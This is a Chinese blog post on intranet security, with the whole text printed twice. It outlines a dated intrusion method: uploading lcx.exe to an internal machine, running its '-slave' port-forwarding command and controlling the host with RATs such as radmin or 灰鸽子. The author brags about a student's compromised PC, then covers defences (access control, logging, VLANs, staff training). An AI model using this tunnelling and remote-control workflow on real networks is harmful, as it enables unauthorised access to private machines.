信息来源:猫猫's Blog
随着现在的网络发展趋势,公司内网,学校内网,甚至银行内网,应用的越来越广,并且一步步地发挥着越来越大的作用。于是很多人瞄准了这块很爽的奶酪,于是有了种种关于内网的传说。
内网的安全也被提上了日程,很多对内网的入侵,渗透也被很多同行描绘的淋漓尽致。很多的精品,在此,我就是简单的介绍一下关于内网的各种东东。
一、攻击内网
首先介绍几种攻击内网时用到的利器,lcx.exe,CMD内网杀手(和前者有类似),黑洞,pcshare,radmin,灰鸽子,等等。相信大家对这些东西都比较熟悉,在此就不再介绍。一般来说,处于局域网的机器很少能被黑客攻击,因为没有固定的IP,甚至对于一些内网用户根本不可能连接到外网。黑客是怎么进行入侵的呢?找台肉鸡的活,我就不干了。查找合适的(内网)机子,上传lcx.exe,(呵呵,这个攻击方法比较落后了)。运行:
TCP 0.0.0.0:8855 0.0.0.0:0 LISTENING
运行成功!这时你可以配置自己的radmin或者灰鸽子了。Lcx的运行方式:lcx.exe -slave公网IP 端口 内网IP 映射端口,轻车熟路,设置好各端口,ok,let's go!!(耳边传来cs的声音……)运行自己的R端,看到了吧,你的小肉鸡已经在线上了。好家伙,居然在玩宠物。羡慕ing……看看还有什么可以利用的,发现江民,但是破解版的,失望啊。
这种方法在现实中广为流传,但是较为简单,偶比较笨拙,也只能用这种方法了,汗。这只是小试牛刀(这台机子好象是学生的)。但是如果入侵的是一公司的主机,哈哈,你可发了。对于端口的映射,基本原理还是相似的,先利用任一种端口工具映射一个或多个端口再进行入侵,我在此就不再多提了。还有最经典的就是"内鬼"了。
因为入侵的过程和手段都是次要的,我们面对的是信息安全的威胁。当然我相信很多人都只是想证明一下自己,但是不乏破坏者。告诫大家一句:慎重。
二、内网的反击。
内网安全是一项长期的任务,安全体系的结构,内网管理人员的素质能力培养,安全体系的具体建设,这些都能给内网带来致命的打击,安全体系就是一支双刃剑,他当然还能带来让人放心的保护。
首先,设置人员安全级别。针对内网中重要的服务器部分,为保证访问人员身份的合法性,采用身份认证系统对访问人员身份的合法性加以确认,对访问服务器的人员做详细的访问控制。给不同的用户设顶确切的权限,禁止权限低的用户访问重要内容,篡改系统设置。
其次,加强对系统log的管理。利用系统的记录功能,对网络中所出现的操作和数据等做详细的记录,为事后攻击事件的分析提供了有力的原始依据。直至抓到罪魁祸首,找出漏洞所在,并进行及时弥补,改善。
再者,对区域的限制也是一个很重要的方面。对于一个大型的局域网络内部,往往会根据实际需要划分出多个安全等级不同的区域,合理的进行安全域的划分,利用网络设备所提供的划分VLAN技术等对网络进行初步的安全防护。安全登记的不同,相应的操作的具体过程也应受到限制。
当然,内部的管理人员的素质,也是很重要的,技术在管理方面只能占到4分,而人才是真正的主导力量。加强人员的培养和培训,相信公司网络的安全会更好。
后记:这篇文章只是在看到一家大的公司内网被破坏后的一点感悟,甚感网络安全的重要性和急迫性。对于一些想炫耀搞破坏的人,还是收敛一些好。
随着现在的网络发展趋势,公司内网,学校内网,甚至银行内网,应用的越来越广,并且一步步地发挥着越来越大的作用。于是很多人瞄准了这块很爽的奶酪,于是有了种种关于内网的传说。
内网的安全也被提上了日程,很多对内网的入侵,渗透也被很多同行描绘的淋漓尽致。很多的精品,在此,我就是简单的介绍一下关于内网的各种东东。
一、攻击内网
首先介绍几种攻击内网时用到的利器,lcx.exe,CMD内网杀手(和前者有类似),黑洞,pcshare,radmin,灰鸽子,等等。相信大家对这些东西都比较熟悉,在此就不再介绍。一般来说,处于局域网的机器很少能被黑客攻击,因为没有固定的IP,甚至对于一些内网用户根本不可能连接到外网。黑客是怎么进行入侵的呢?找台肉鸡的活,我就不干了。查找合适的(内网)机子,上传lcx.exe,(呵呵,这个攻击方法比较落后了)。运行:
TCP 0.0.0.0:8855 0.0.0.0:0 LISTENING
运行成功!这时你可以配置自己的radmin或者灰鸽子了。Lcx的运行方式:lcx.exe -slave公网IP 端口 内网IP 映射端口,轻车熟路,设置好各端口,ok,let's go!!(耳边传来cs的声音……)运行自己的R端,看到了吧,你的小肉鸡已经在线上了。好家伙,居然在玩宠物。羡慕ing……看看还有什么可以利用的,发现江民,但是破解版的,失望啊。
这种方法在现实中广为流传,但是较为简单,偶比较笨拙,也只能用这种方法了,汗。这只是小试牛刀(这台机子好象是学生的)。但是如果入侵的是一公司的主机,哈哈,你可发了。对于端口的映射,基本原理还是相似的,先利用任一种端口工具映射一个或多个端口再进行入侵,我在此就不再多提了。还有最经典的就是"内鬼"了。
因为入侵的过程和手段都是次要的,我们面对的是信息安全的威胁。当然我相信很多人都只是想证明一下自己,但是不乏破坏者。告诫大家一句:慎重。
二、内网的反击。
内网安全是一项长期的任务,安全体系的结构,内网管理人员的素质能力培养,安全体系的具体建设,这些都能给内网带来致命的打击,安全体系就是一支双刃剑,他当然还能带来让人放心的保护。
首先,设置人员安全级别。针对内网中重要的服务器部分,为保证访问人员身份的合法性,采用身份认证系统对访问人员身份的合法性加以确认,对访问服务器的人员做详细的访问控制。给不同的用户设顶确切的权限,禁止权限低的用户访问重要内容,篡改系统设置。
其次,加强对系统log的管理。利用系统的记录功能,对网络中所出现的操作和数据等做详细的记录,为事后攻击事件的分析提供了有力的原始依据。直至抓到罪魁祸首,找出漏洞所在,并进行及时弥补,改善。
再者,对区域的限制也是一个很重要的方面。对于一个大型的局域网络内部,往往会根据实际需要划分出多个安全等级不同的区域,合理的进行安全域的划分,利用网络设备所提供的划分VLAN技术等对网络进行初步的安全防护。安全登记的不同,相应的操作的具体过程也应受到限制。
当然,内部的管理人员的素质,也是很重要的,技术在管理方面只能占到4分,而人才是真正的主导力量。加强人员的培养和培训,相信公司网络的安全会更好。
后记:这篇文章只是在看到一家大的公司内网被破坏后的一点感悟,甚感网络安全的重要性和急迫性。对于一些想炫耀搞破坏的人,还是收敛一些好。
回复Comments
{commenttime}{commentauthor}
{CommentUrl}
{commentcontent}